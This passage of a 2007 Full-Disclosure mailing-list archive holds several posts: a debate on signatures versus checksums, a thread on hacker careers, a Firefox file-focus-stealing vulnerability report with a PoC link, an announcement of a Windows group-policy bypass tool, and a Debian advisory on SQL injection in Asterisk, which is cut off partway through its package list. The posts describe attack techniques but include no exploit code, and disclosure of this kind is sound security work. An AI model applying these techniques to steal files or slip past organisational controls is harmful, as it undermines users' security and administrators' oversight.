between St Louis and New Orleans?  Your choices are limited - under the bottom
of an interstate highway bridge right next to your competitor's conduit, or
you get to trench all the way across the river, and hope you put it deep enough
so if they ever have to dredge the channel, you won't get hit.  Similar
issues apply to Manhattan and a lot of other places.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071202/7f717524/attachment.bin 

From coderman at gmail.com  Sun Dec  2 05:59:30 2007
From: coderman at gmail.com (coderman)
Date: Sat, 1 Dec 2007 21:59:30 -0800
Subject: [Full-disclosure] Signature or checksum? (was: MD5 considered
	harmful)
Message-ID: <4ef5fec60712012159q21848fbdp62aee2d0ccd2d76b@mail.gmail.com>

On Dec 1, 2007 7:08 PM,  <Valdis.Kletnieks at vt.edu> wrote:
> ...
> (Note that strictly speaking, what you *really* want is a PGP-signed or
> otherwise authenticated MD5/SHA-256 hash.  Otherwise, if I'm an attacker,
> I can just splat a new binary up, and a new MD5SUMS file that lists the
> MD5 sum for the backdoored binaries.  If anything, more people manage to
> screw *this* part up than the much lesser offense of still using MD5 rather
> than something from the SHA-2 family)....

this has come up recently in situations like the hushmail trojan'd applets
and so forth.  consider a court order that compels you to sign a given
backdoor'd product in use by a targeted individual.

in this case, the use of signatures provides less security than comparing
public checksums.  (because you'd notice that your particular download
has a different sum, while comparing signatures you'd assume it was
legitimate.)

ideally everyone would compare both a signature (a trusted source
provided it) as well as a public checksum (let's assume you can do so
out of band securely using archives or other channel not actively
controlled by an attacker).

i know that signatures include a checksum, but this is hidden by the
verification process.  the human really needs to be in the loop for both.

best regards,

p.s.  for the tin foil hat crowd, those digital sigs are looking
weaker every year compared to cryptographic hash functions and block
ciphers:

http://dwave.wordpress.com/2007/11/26/slides-from-sc07-progress-in-quantum-computing-panel/

not to mention GNFS improvements the last few years...

(ok, i admit, i love an excuse to reference Mr. T)



From coderman at gmail.com  Sun Dec  2 06:28:38 2007
From: coderman at gmail.com (coderman)
Date: Sat, 1 Dec 2007 22:28:38 -0800
Subject: [Full-disclosure] authentic hackers still do it for the love
	... (was: Hell Camp: It never pays enough)
Message-ID: <4ef5fec60712012228oe7333a2t894b553628f1d8c@mail.gmail.com>

On Dec 1, 2007 9:12 PM, Goebbels Amadeus <paul.goebbels at freemail.hu> wrote:
> ...
> Have you ever considered your future in their hands? You've
> been working for 50 years, your liver and kidneys start failing,
> creating visible symptoms, stains in your skin. You can't handle
> life in the same way anymore. For what? What have you done in
> those 50 years but serving another man to become more wealthy
> and over powered. The approaching day of your death and its
> mere vision strikes you like a burning iron blade.
> ...
> talented youth started emerging and dedicated passionately to
> fulfill its curiosity. Day after day, spending countless hours
> in front of a machine. Understanding it's inner design and
> details, breaking it apart and reassembling it the way it wasn't
> meant to be assembled.
>
> [a parable of looking for filthy lucre in a trade of love, only to
>  to discover that these dark funds have tainted the joy and
>  purity of a process and lifestyle that once brought fulfillment]

sooner or later every authentic hacker discovers that you must
separate work from play.  when you try and mix them both you
betray the joy and fulfillment of hacking for a paycheck, and it
never pays enough.

the ability of a person to deny and downplay this reality will
determine their ability to abide the infosecwhore industry.

as captain of their own independent ship they can insulate
themselves from much of this whoreish taint, but sooner or
later a labor for lucre will destroy the love.

no need to preach, the authentic hacker will discover this
on their own accord sooner or later.  it is inevitable.

for those of you on the cusp of this realization and ready to
start anew, do it.  abandon ship.  find a comfy admin or analyst
position with decent benefits and a wage that pays the mortgage.

adopt that pseudonym and rediscover the joy of hacking for its
own sake.  the rewards are still there, worth more than a dollar
can provide...

---

as with any broad categorization there are exceptions to this rule.
there is a minuscule minority that has found an amalgamation
sufficiently lucrative and deeply enjoyable without compromising
on any personal integrity.

to these people i say: you lucky fucks!
may i find such fortune one day...



From pdp.gnucitizen at googlemail.com  Sun Dec  2 08:48:52 2007
From: pdp.gnucitizen at googlemail.com (pdp (architect))
Date: Sun, 2 Dec 2007 08:48:52 +0000
Subject: [Full-disclosure] authentic hackers still do it for the love
	... (was: Hell Camp: It never pays enough)
In-Reply-To: <4ef5fec60712012228oe7333a2t894b553628f1d8c@mail.gmail.com>
References: <4ef5fec60712012228oe7333a2t894b553628f1d8c@mail.gmail.com>
Message-ID: <6905b1570712020048t8c49b53rbf30e7a21d2e50b0@mail.gmail.com>

right, this is what I like to call hacker romanticism, but do you know what?
it does not work this way! only in the movies, I guess! so if you are a
hacker, if you truly believe that you are a hacker, then you will find a way
to be better off then anybody else without the need to break any laws and
without compromising your passions at all.

there is one very old Chinese saying: "find a job that you love and you will
never work for the rest of your life". Being a technically talented person
and spending your life as a poor sysadmin is plain stupid not to say
completely unnecessary. Running away from money because you think that they
will corrupt you or they will compromise your identity is also quite
retarded to say, don't you think? money are just means to an end, a tool of
trade, and sometimes this is exactly what you need in order to cross to the
next level.

hacking is not about the inner geek and the vision of the lonely cyber
worrier. hacking is about outsmarting others. it is about thinking
creatively and moreover, thinking differently. if you can hack computer
systems, then hack life. you will soon realize the the skills that you have
obtained while being a technical hacker can be applied to many other
disciplines, and these skills are more valuable then you think. collecting
the fruits of your work is the most rewarding feeling.

the problem I see is that hacking has become something that is not. the
computer security hacker circles lost the sense of creativity and turned it
into plain procedure. most, if not all, of the security vulnerabilities
discovered today are discovered due to simple rules. you do this, you run
that, you wait, you've got it. this is not hacking. given enough time,
anybody can learn that. but embracing the mindset is something that a few
can do.

btw, GC is currently running a project to show the reality of what I've juts
said. it is still in very initial stage but it will get better with the
time: hakiri.com

On Dec 2, 2007 6:28 AM, coderman <coderman at gmail.com> wrote:

> On Dec 1, 2007 9:12 PM, Goebbels Amadeus <paul.goebbels at freemail.hu>
> wrote:
> > ...
> > Have you ever considered your future in their hands? You've
> > been working for 50 years, your liver and kidneys start failing,
> > creating visible symptoms, stains in your skin. You can't handle
> > life in the same way anymore. For what? What have you done in
> > those 50 years but serving another man to become more wealthy
> > and over powered. The approaching day of your death and its
> > mere vision strikes you like a burning iron blade.
> > ...
> > talented youth started emerging and dedicated passionately to
> > fulfill its curiosity. Day after day, spending countless hours
> > in front of a machine. Understanding it's inner design and
> > details, breaking it apart and reassembling it the way it wasn't
> > meant to be assembled.
> >
> > [a parable of looking for filthy lucre in a trade of love, only to
> >  to discover that these dark funds have tainted the joy and
> >  purity of a process and lifestyle that once brought fulfillment]
>
> sooner or later every authentic hacker discovers that you must
> separate work from play.  when you try and mix them both you
> betray the joy and fulfillment of hacking for a paycheck, and it
> never pays enough.
>
> the ability of a person to deny and downplay this reality will
> determine their ability to abide the infosecwhore industry.
>
> as captain of their own independent ship they can insulate
> themselves from much of this whoreish taint, but sooner or
> later a labor for lucre will destroy the love.
>
> no need to preach, the authentic hacker will discover this
> on their own accord sooner or later.  it is inevitable.
>
> for those of you on the cusp of this realization and ready to
> start anew, do it.  abandon ship.  find a comfy admin or analyst
> position with decent benefits and a wage that pays the mortgage.
>
> adopt that pseudonym and rediscover the joy of hacking for its
> own sake.  the rewards are still there, worth more than a dollar
> can provide...
>
> ---
>
> as with any broad categorization there are exceptions to this rule.
> there is a minuscule minority that has found an amalgamation
> sufficiently lucrative and deeply enjoyable without compromising
> on any personal integrity.
>
> to these people i say: you lucky fucks!
> may i find such fortune one day...
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071202/86fdb6b8/attachment.html 

From coderman at gmail.com  Sun Dec  2 09:27:55 2007
From: coderman at gmail.com (coderman)
Date: Sun, 2 Dec 2007 01:27:55 -0800
Subject: [Full-disclosure] authentic hackers still do it for the love
	... (was: Hell Camp: It never pays enough)
In-Reply-To: <6905b1570712020048t8c49b53rbf30e7a21d2e50b0@mail.gmail.com>
References: <4ef5fec60712012228oe7333a2t894b553628f1d8c@mail.gmail.com>
	<6905b1570712020048t8c49b53rbf30e7a21d2e50b0@mail.gmail.com>
Message-ID: <4ef5fec60712020127j5b996708k18f8317172057a59@mail.gmail.com>

On Dec 2, 2007 12:48 AM, pdp (architect) <pdp.gnucitizen at googlemail.com> wrote:
> ... you will find a way
> to be better off then anybody else without the need to break any laws ..

what does breaking the law have to do with this?


> there is one very old Chinese saying: "find a job that you love and you will
> never work for the rest of your life".

sure.  it takes a while to get there, don't you think?


> Being a technically talented person
> and spending your life as a poor sysadmin is plain stupid not to say
> completely unnecessary. Running away from money because you think that they
> will corrupt you or they will compromise your identity is also quite
> retarded to say, don't you think? money are just means to an end, a tool of
> trade, and sometimes this is exactly what you need in order to cross to the
> next level.

agreed.  perhaps i should have emphasized a path out, rather than destination...


> the problem I see is that hacking has become something that is not. the
> computer security hacker circles lost the sense of creativity and turned it
> into plain procedure. most, if not all, of the security vulnerabilities
> discovered today are discovered due to simple rules. you do this, you run
> that, you wait, you've got it. this is not hacking. given enough time,
> anybody can learn that. but embracing the mindset is something that a few
> can do.

this is what i suggested escaping, the mechanical substitute for what used
to be a creative and passionate endeavor.  escape from it, leave the
mechanical to something that pays the bills until you can find and enjoy
the "job you love where you never work another day in your life..."

if you can do this while mired in infosec whorey, more power to you.  the
admin / routine positions seem more accommodating to telecommute, flexible
schedule, and "free time" while giving the appearance of "working".


> btw, GC is currently running a project to show the reality of what I've juts
> said. it is still in very initial stage but it will get better with the
> time: hakiri.com

i'm watching and waiting...



From coderman at gmail.com  Sun Dec  2 09:33:32 2007
From: coderman at gmail.com (coderman)
Date: Sun, 2 Dec 2007 01:33:32 -0800
Subject: [Full-disclosure] authentic hackers still do it for the love
	... (was: Hell Camp: It never pays enough)
In-Reply-To: <4ef5fec60712020127j5b996708k18f8317172057a59@mail.gmail.com>
References: <4ef5fec60712012228oe7333a2t894b553628f1d8c@mail.gmail.com>
	<6905b1570712020048t8c49b53rbf30e7a21d2e50b0@mail.gmail.com>
	<4ef5fec60712020127j5b996708k18f8317172057a59@mail.gmail.com>
Message-ID: <4ef5fec60712020133w2c542dc7u4edace047b906fcf@mail.gmail.com>

On Dec 2, 2007 1:27 AM, coderman <coderman at gmail.com> wrote:
> ...
> admin / routine positions seem more accommodating to telecommute, flexible
> schedule, and "free time" while giving the appearance of "working".

i completely forgot to mention lack of non compete, intellectual
property agreements, and other legal bullshit that par for the
infosecwhore course...



From juha-matti.laurio at netti.fi  Sun Dec  2 09:34:42 2007
From: juha-matti.laurio at netti.fi (Juha-Matti Laurio)
Date: Sun, 2 Dec 2007 11:34:42 +0200 (EET)
Subject: [Full-disclosure] Firefox 2.0.0.11 File Focus Stealing
 vulnerability
Message-ID: <24658565.123601196588082933.JavaMail.juha-matti.laurio@netti.fi>

It appears that BID 26669 doesn't list these Bugzilla entries any more.

- Juha-Matti

Juha-Matti Laurio <juha-matti.laurio at netti.fi> kirjoitti: 
> N/A unfortunately, but BID26669 points to entries
> https://bugzilla.mozilla.org/show_bug.cgi?id=258875
> and
> https://bugzilla.mozilla.org/show_bug.cgi?id=56236
> 
> via this older one advisory: http://www.securityfocus.com/bid/18308/references
> 
> Link: http://www.securityfocus.com/bid/26669/discuss
> 
> (Probably BID18038 mentioned is a typo...)
> 
> - Juha-Matti
> 
> 
> "Randal, Phil" <prandal at herefordshire.gov.uk> kirjoitti: 
> > 
> >  And the Mozilla bugzilla number is?
> > 
> > 
> > -----Original Message-----
> > From: full-disclosure-bounces at lists.grok.org.uk
> > [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of
> > Juha-Matti Laurio
> > Sent: 01 December 2007 15:25
> > To: carl hardwick; full-disclosure at lists.grok.org.uk
> > Subject: Re: [Full-disclosure] Firefox 2.0.0.11 File Focus Stealing
> > vulnerability
> > 
> > Netscape Navigator version 9.0.0.4 is affected too. Test done with
> > PoC-type URL mentioned on Mac OS X 10.4.10 fully patched.
> > Vendor was contacted on 1st Dec 2007.
> > 
> > - Juha-Matti
> > 
> > carl hardwick <hardwick.carl at gmail.com> wrote: 
> > > Firefox 2.0.0.11 File Focus Stealing vulnerability:
> > > 
> > > Sorry Mozilla, but the recent file focus fix was not enough. I think 
> > > Mozilla made another mistake while fixing the previous file/label 
> > > issue. Because now I embed a file field and a textfield inside one 
> > > label. When this happens, and you type only one time in the textfield,
> > 
> > > the focus travels to the file field and the value travels with it.
> > > Back to the drawing board I would say. I only got it to work in 
> > > Firefox, Gareth checked Safari for me, and it also works in Safari. I 
> > > guess this type of exploit could function on other HTML objects as 
> > > well, and could be very dangerous because it only requires a one time 
> > > focus in a textfield.
> > > 
> > > PoC here:
> > > http://carl-hardwick.googlegroups.com/web/Firefox20011StealFocusFlaw.h
> > > tm
> > > 
> 



From nadtec at hotmail.com  Sun Dec  2 09:42:26 2007
From: nadtec at hotmail.com (happy nino)
Date: Sun, 2 Dec 2007 09:42:26 +0000
Subject: [Full-disclosure] need help in managing administrators
In-Reply-To: <4751369B.9060307@pirate-radio.org>
References: <4751369B.9060307@pirate-radio.org>
Message-ID: <BAY108-W322BB21B2871F55233261DD6730@phx.gbl>





Hi All,i've a problem in my organization that we have several domain admins, we are in the process of removing most of them but i need to have a person only authorized to installnew software to users' computers but without having access to other parts of the users machines, is this possible ?..can i delegate a function like this only to certain users with outbeing domain admins?Appreciate your great helpthanks alot regards,Nad 
_________________________________________________________________
Who's friends with who and co-starred in what?
http://www.searchgamesbox.com/celebrityseparation.shtml
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071202/c4d790fb/attachment.html 

From eric at rachner.us  Sun Dec  2 11:03:09 2007
From: eric at rachner.us (Eric Rachner)
Date: Sun, 2 Dec 2007 12:03:09 +0100
Subject: [Full-disclosure] Bypassing group policy
Message-ID: <002001c834d2$fffdaa90$fff8ffb0$@us>

Hi all,

 

I just posted a quick little tool for bypassing certain group policy
restrictions under Windows.  It's not technically novel or interesting, but
it's handy to have if you need to operate within a domain-joined desktop
environment that's subject to group policy controls.

 

Details, binaries & source are posted here: http://www.rachner.us/blog/?p=15

 

Cheers,

 

- Eric

 

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071202/4911312d/attachment.html 

From jmm at debian.org  Sun Dec  2 12:06:03 2007
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Sun, 2 Dec 2007 13:06:03 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1417-1] New asterisk packages fix
	SQL injection
Message-ID: <20071202120603.GA4180@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1417-1                  security at debian.org
http://www.debian.org/security/                       Moritz Muehlenhoff
December 02, 2007                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : asterisk
Vulnerability  : missing input sanitising
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2007-6170

Tilghman Lesher discovered that the logging engine of Asterisk, a free
software PBX and telephony toolkit performs insufficient sanitising of
call-related data, which may lead to SQL injection.

For the stable distribution (etch), this problem has been fixed in
version 1:1.2.13~dfsg-2etch2. Updated packages for ia64 will be provided
later.

For the old stable distribution (sarge), this problem has been fixed
in version asterisk 1:1.0.7.dfsg.1-2sarge6.

We recommend that you upgrade your asterisk packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian 3.1 (oldstable)
- ----------------------

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge6.diff.gz
    Size/MD5 checksum:    73711 44d028cde298e8f7b284f1e5f23e282b
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1.orig.tar.gz
    Size/MD5 checksum:  2929488 0d0f718ccd7a06ab998c3f637df294c0
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge6.dsc
    Size/MD5 checksum:     1299 cba7066ff71b2ff473008c93a834094b

Architecture independent packages:

  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-sounds-main_1.0.7.dfsg.1-2sarge6_all.deb
    Size/MD5 checksum:  1180744 5991109424e0f9e1dbdb7f5638085591
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-doc_1.0.7.dfsg.1-2sarge6_all.deb
    Size/MD5 checksum:  1578186 efebc4a9928065b0c559539000e5e71f
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dev_1.0.7.dfsg.1-2sarge6_all.deb
    Size/MD5 checksum:    83976 013903b5a38c5813811587fb638514fb
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-web-vmail_1.0.7.dfsg.1-2sarge6_all.deb
    Size/MD5 checksum:    28968 9df0fbd4b3a8d909aaf0cf265881ea58
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-config_1.0.7.dfsg.1-2sarge6_all.deb
    Size/MD5 checksum:    62190 d5a4064aa448829ea30efdc8b0728704

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge6_alpha.deb
    Size/MD5 checksum:  1503330 19cf64b0500b5f32d5d7fabbedff844f
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge6_alpha.deb
    Size/MD5 checksum:    32350 cb51cc369b6af13d30cb89fea320cad2
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge6_alpha.deb
    Size/MD5 checksum:    21768 fcd35799afddc4047249c7e97b2f38cd

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge6_amd64.deb
    Size/MD5 checksum:    22042 ebb7b2beddb130b8a4c131e054f371e3
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge6_amd64.deb
    Size/MD5 checksum:  1334162 ed16172e3931d0068b2501b851645156
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge6_amd64.deb
    Size/MD5 checksum:    31436 e20a91ebba5f67900bc8b443200f11f6

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge6_arm.deb
    Size/MD5 checksum:    30288 d3fed93376c7f4d7bcce1f3709bcb23a
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge6_arm.deb
    Size/MD5 checksum:    22046 8f2c8c14dc0bdd4927d3221bd79afe8c
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge6_arm.deb
    Size/MD5 checksum:  1285322 48c3e537c9092b0e13bf024fa280f08a

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge6_hppa.deb
    Size/MD5 checksum:    22044 8e75a899a7b963e3cc6a777692203757
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge6_hppa.deb
    Size/MD5 checksum:    32078 e8ed693449fc423177ad9ed194d37e27
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge6_hppa.deb
    Size/MD5 checksum:  1448902 1497b1c6497658696d293ba3f39d4525

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge6_i386.deb
    Size/MD5 checksum:    30464 a0a8a5d35dd06ed8be8af8acdc98f736
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge6_i386.deb
    Size/MD5 checksum:    22044 ecae3e71a92c4f01b1a6ead8e97924a7
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge6_i386.deb
    Size/MD5 checksum:  1175934 6cb2fe293e3d2381ee95cbf50644ac44

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge6_ia64.deb
    Size/MD5 checksum:  1772256 87fc47caec0b66f2b0f4f00ddf6daa27
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge6_ia64.deb
    Size/MD5 checksum:    33574 ec8ecec8c3dbb5154404cacb3c3a47a9
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge6_ia64.deb
    Size/MD5 checksum:    22044 e2bb42321d579ba257a77818226e6b69

m68k architecture (Motorola Mc680x0)

  http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge6_m68k.deb
    Size/MD5 checksum:  1185716 6e3fe558a2ec44e05043186991c41093
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge6_m68k.deb
    Size/MD5 checksum:    30820 77b9de99f9f5ad1857568e39f63b8d4c
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge6_m68k.deb
    Size/MD5 checksum:    22054 b069cd54d7252acdd295d59befb820c4

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge6_mips.deb
    Size/MD5 checksum:  1264864 469aa61e6d902fffed273f29a2a842f0
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge6_mips.deb
    Size/MD5 checksum:    22052 5b9e306014a84165740901274def6a2c
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge6_mips.deb
    Size/MD5 checksum:    30038 7d61fbba843d52b589f953bb35b73b98

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge6_mipsel.deb
    Size/MD5 checksum:    29970 982ca3d10deced2bd6840fcd57f454e3
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge6_mipsel.deb
    Size/MD5 checksum:    22046 81aea013d81cc8221cc8a6a5ce9bf3fc
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge6_mipsel.deb
    Size/MD5 checksum:  1271080 d65c1225c68b7dd66094084b9114f2d1

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge6_powerpc.deb
    Size/MD5 checksum:  1422816 b463ee475325b5cf149b70d428525ffc
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge6_powerpc.deb
    Size/MD5 checksum:    22048 3b5dd6f2ff7fb45e7f17cb335fcbcfa3
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge6_powerpc.deb
    Size/MD5 checksum:    31768 12ae4e4e62b76af4fda589e23d9b1feb

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge6_s390.deb
    Size/MD5 checksum:  1313296 76be9c71e1ea8b333d4fa3a3288befbf
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge6_s390.deb
    Size/MD5 checksum:    22046 12e91803d4abc7b796c8ce84ae8a036d
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge6_s390.deb
    Size/MD5 checksum:    31452 b176db899110dcf960d39e995ac554a3

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge6_sparc.deb
    Size/MD5 checksum:    30428 332ef000a128111344360c7f2c8c8d24
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge6_sparc.deb
    Size/MD5 checksum:    22050 ec745f87b6fb7d858d8f975d8f55dd30
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge6_sparc.deb
    Size/MD5 checksum:  1275162 4ba784cdb44193991fc5d69e3eb6b59c

Debian (stable)
- ---------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.2.13~dfsg-2etch2.dsc
    Size/MD5 checksum:     1488 5bc27dcf0a82a73e8a79ad78b17277aa
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.2.13~dfsg.orig.tar.gz
    Size/MD5 checksum:  3835589 f8ee088b2e4feffe2b35d78079f90b69
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.2.13~dfsg-2etch2.diff.gz
    Size/MD5 checksum:   179646 5d5d4999c1cbd810b7aa9bb2ed89967d

Architecture independent packages:

  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dev_1.2.13~dfsg-2etch2_all.deb
    Size/MD5 checksum:   169978 7bcb107cd321b2649bf2638088a8f7f7
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.2.13~dfsg-2etch2_all.deb
    Size/MD5 checksum:   146506 a73171bc89be77d7d66fa86aee7ce521
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-doc_1.2.13~dfsg-2etch2_all.deb
    Size/MD5 checksum:  1499934 3a7d5bc17573ecb07432ebac20247d00
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-sounds-main_1.2.13~dfsg-2etch2_all.deb
    Size/MD5 checksum:  1504618 2523347e9ce20b9f83616c4a51507b0d
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-web-vmail_1.2.13~dfsg-2etch2_all.deb
    Size/MD5 checksum:    73776 cd61cec42645c392fa4daa6fee0f3a7b
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-config_1.2.13~dfsg-2etch2_all.deb
    Size/MD5 checksum:   131684 f9e7c93285e12f5cbb3665a130f39750

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.2.13~dfsg-2etch2_alpha.deb
    Size/MD5 checksum:   136988 f2c7839a68c5ec1ea803fb3f49cfd939
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-bristuff_1.2.13~dfsg-2etch2_alpha.deb
    Size/MD5 checksum:  1934250 3925790d7f8397680da3bd0b805cff84
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-classic_1.2.13~dfsg-2etch2_alpha.deb
    Size/MD5 checksum:  1897664 40a01e3530bb95b00eaccb522e7fbb2d

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.2.13~dfsg-2etch2_amd64.deb
    Size/MD5 checksum:   133208 c5a4da5c660f6f2d10c5dfc28db3bdae
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-bristuff_1.2.13~dfsg-2etch2_amd64.deb
    Size/MD5 checksum:  1779438 6d02381aac4b47d49ad78bdfc1322f2e
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-classic_1.2.13~dfsg-2etch2_amd64.deb
    Size/MD5 checksum:  1744402 c79f28ee28ea91c22fa70a261464f6e0

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-classic_1.2.13~dfsg-2etch2_arm.deb
    Size/MD5 checksum:  1667594 e1461ab8028dda720c70a4c9122380a6
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.2.13~dfsg-2etch2_arm.deb
    Size/MD5 checksum:   136364 b317f608dfe36d7c3b4c57b47922b08a
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-bristuff_1.2.13~dfsg-2etch2_arm.deb
    Size/MD5 checksum:  1700884 5c247f91c863f70d7f1d7c55cecc7944

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-bristuff_1.2.13~dfsg-2etch2_hppa.deb
    Size/MD5 checksum:  1869254 ddfd48013d5b55c1c29c3c261c07ba9d
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.2.13~dfsg-2etch2_hppa.deb
    Size/MD5 checksum:   145166 d3ddaf5fdb652e7e17a6ed9987c212cf
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-classic_1.2.13~dfsg-2etch2_hppa.deb
    Size/MD5 checksum:  1830482 0d2310cb2e78f3cfafc85d5ac95156f2

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-classic_1.2.13~dfsg-2etch2_i386.deb
    Size/MD5 checksum:  1615842 e1bd13a9e3f86a0f8a1d0ffa941ea2f0
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.2.13~dfsg-2etch2_i386.deb
    Size/MD5 checksum:   130902 13682de2a18935813a5899bb203f3341
  http://security.debian.org/pool/updates/main/a/asterisk/asterisk-bristuff_1.2.13~dfsg-2etch2_i386.deb
    Size/MD5 checksum:  1649108 d8370ac6b5b6768cdcd9a89a9e5435d3

mips architecture (MIPS (Big Endian))

